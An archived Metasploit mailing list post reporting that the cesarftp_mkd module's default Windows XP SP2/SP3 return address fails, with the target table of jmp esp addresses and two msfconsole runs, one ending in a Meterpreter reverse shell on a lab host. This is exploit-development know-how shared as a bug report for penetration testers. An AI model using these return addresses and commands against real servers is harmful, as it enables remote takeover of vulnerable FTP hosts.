Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

cesarftp_mkd default target XP SP2/SP3 doesn't work

From: One Time <onetime99 () ymail com>
Date: Mon, 22 Feb 2010 13:13:28 -0800 (PST)
In the cesarftp_mkd module default targets are:

[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],
[ 'Windows 2000 Pro SP4 
French',  { 'Ret' => 0x775F29D0 } ],
[ 'Windows XP SP2/SP3 
English',       { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll
#[ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp 
esp, winmm.dll
#[ 'Windows XP SP3 English',       { 'Ret' => 
0x76b43adc } ], # jmp esp, winmm.dll
[ 'Windows 2003 SP1 
English',     { 'Ret' => 0x76AA679b } ],

The exploit works 
only If I enable the commented out target: "#[ 'Windows XP 
SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp 
esp, winmm.dll"

---

The following is the result of a test 
run against Windows XP SP2 (English) with svn r8585 (2010.02.22) and 
target [ 'Windows XP SP2/SP3 English',       { 'Ret' => 0x774699bf } 
], # 
jmp esp, user32.dll:

msf > use 
exploit/windows/ftp/cesarftp_mkd
msf exploit(cesarftp_mkd) > set 
PAYLOAD windows/meterpreter/reverse_ord_tcp
PAYLOAD => 
windows/meterpreter/reverse_ord_tcp
msf exploit(cesarftp_mkd) > 
set TARGET 2
TARGET => 2
msf exploit(cesarftp_mkd) > set 
LHOST 192.168.159.131
LHOST => 192.168.159.131
msf 
exploit(cesarftp_mkd) > set RHOST 192.168.159.134
RHOST => 
192.168.159.134
msf exploit(cesarftp_mkd) > exploit

[*] 
Started reverse handler on 192.168.159.131:4444
[*] Connecting to FTP server 192.168.159.134:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla () example com...
[*] Sending password...
[*] Trying target Windows XP SP2/SP3 English...
[*] Exploit completed, but no session was created.
msf 
exploit(cesarftp_mkd) >

--

The following is the result of a test run against Windows XP SP2 
(English) with svn r8585 (2010.02.22) and target [ 'Windows XP SP2 
English',       { 'Ret' => 0x76b43ae0 } ], # jmp 
esp, winmm.dll:

msf > use exploit/windows/ftp/cesarftp_mkd
msf exploit(cesarftp_mkd) > set PAYLOAD 
windows/meterpreter/reverse_ord_tcp
PAYLOAD => 
windows/meterpreter/reverse_ord_tcp
msf exploit(cesarftp_mkd) > 
set TARGET 3
TARGET => 3
msf exploit(cesarftp_mkd) > set 
LHOST 192.168.159.131
LHOST => 192.168.159.131
msf 
exploit(cesarftp_mkd) > set RHOST 192.168.159.134
RHOST => 
192.168.159.134
msf exploit(cesarftp_mkd) > exploit

[*] 
Started reverse handler on 192.168.159.131:4444
[*] Connecting to FTP server 192.168.159.134:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password mozilla () example com...
[*] Sending password...
[*] Trying target Windows XP SP2 English...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened 
(192.168.159.131:4444 -> 192.168.159.134:1026)

meterpreter >

--

Regards.



      
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: